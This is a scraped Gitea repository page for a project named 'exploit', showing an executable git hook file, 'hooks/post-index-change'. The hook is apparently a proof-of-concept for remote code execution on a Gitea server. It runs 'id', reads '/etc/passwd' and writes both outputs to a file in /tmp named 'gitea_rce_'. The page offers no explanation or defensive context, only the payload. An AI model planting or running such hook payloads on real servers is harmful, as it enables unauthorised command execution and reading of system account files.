This website requires JavaScript.
Explore
Help
Sign In
33123aaa
/
exploit
Watch
1
Star
0
Fork
You've already forked exploit
0
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
fa2d96037e
exploit
/
hooks
/
post-index-change
5 lines
80 B
Bash
Executable File
Raw
Blame
History
#!/bin/sh
id > /tmp/gitea_rce_
$$
cat /etc/passwd >> /tmp/gitea_rce_
$$
echo
DONE
Reference in New Issue
View Git Blame
Copy Permalink